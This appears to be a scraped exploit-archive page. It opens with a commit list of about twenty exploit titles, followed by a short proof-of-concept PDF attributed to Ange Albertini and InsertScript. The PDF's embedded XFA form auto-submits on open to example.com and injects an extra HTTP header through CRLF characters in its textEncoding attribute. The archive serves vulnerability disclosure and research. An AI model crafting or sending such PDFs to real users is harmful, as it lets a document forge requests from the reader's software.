813a3efbb5
20 changes to exploits/shellcodes Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow Jnes 1.0.2 - Stack Buffer Overflow Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow netek 0.8.2 - Denial of Service Cisco Smart Install - Crash (PoC) Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) Adobe Reader PDF - Client Side Request Injection Windows - Local Privilege Escalation Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit) Adobe Flash < 28.0.0.161 - Use-After-Free Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC) GPON Routers - Authentication Bypass / Command Injection TBK DVR4104 / DVR4216 - Credentials Leak Call of Duty Modern Warefare 2 - Buffer Overflow Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion Squirrelcart 1.x - 'cart.php' Remote File Inclusion Infinity 2.x.x - options[style_dir] Local File Disclosure Infinity 2.x - 'options[style_dir]' Local File Disclosure PHP-Nuke 8.x.x - Blind SQL Injection PHP-Nuke 8.x - Blind SQL Injection WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities Ajax Availability Calendar 3.x - Multiple Vulnerabilities vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting Subrion 3.X.x - Multiple Vulnerabilities Subrion 3.x - Multiple Vulnerabilities Ciuis CRM 1.0.7 - SQL Injection LifeSize ClearSea 3.1.4 - Directory Traversal WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting DLINK DCS-5020L - Remote Code Execution (PoC) Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
48 lines
No EOL
1.2 KiB
Text
48 lines
No EOL
1.2 KiB
Text
% a PDF file using an XFA
|
|
% most whitespace can be removed (truncated to 570 bytes or so...)
|
|
% Ange Albertini BSD Licence 2012
|
|
% modified by InsertScript
|
|
|
|
%PDF-1. % can be truncated to %PDF-\0
|
|
|
|
1 0 obj <<>>
|
|
stream
|
|
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
|
|
<config><present><pdf>
|
|
<interactive>1</interactive>
|
|
</pdf></present></config>
|
|
|
|
<template>
|
|
<subform name="_">
|
|
<pageSet/>
|
|
<field id="Hello World!">
|
|
<event activity="docReady" ref="$host" name="event__click">
|
|
<submit
|
|
textEncoding="UTF-16
test: test
"
|
|
xdpContent="pdf datasets xfdf"
|
|
target="http://example.com/test"/>
|
|
</event>
|
|
</field>
|
|
</subform>
|
|
</template>
|
|
</xdp:xdp>
|
|
endstream
|
|
endobj
|
|
|
|
trailer <<
|
|
/Root <<
|
|
/AcroForm <<
|
|
/Fields [<<
|
|
/T (0)
|
|
/Kids [<<
|
|
/Subtype /Widget
|
|
/Rect []
|
|
/T ()
|
|
/FT /Btn
|
|
>>]
|
|
>>]
|
|
/XFA 1 0 R
|
|
>>
|
|
/Pages <<>>
|
|
>>
|
|
>> |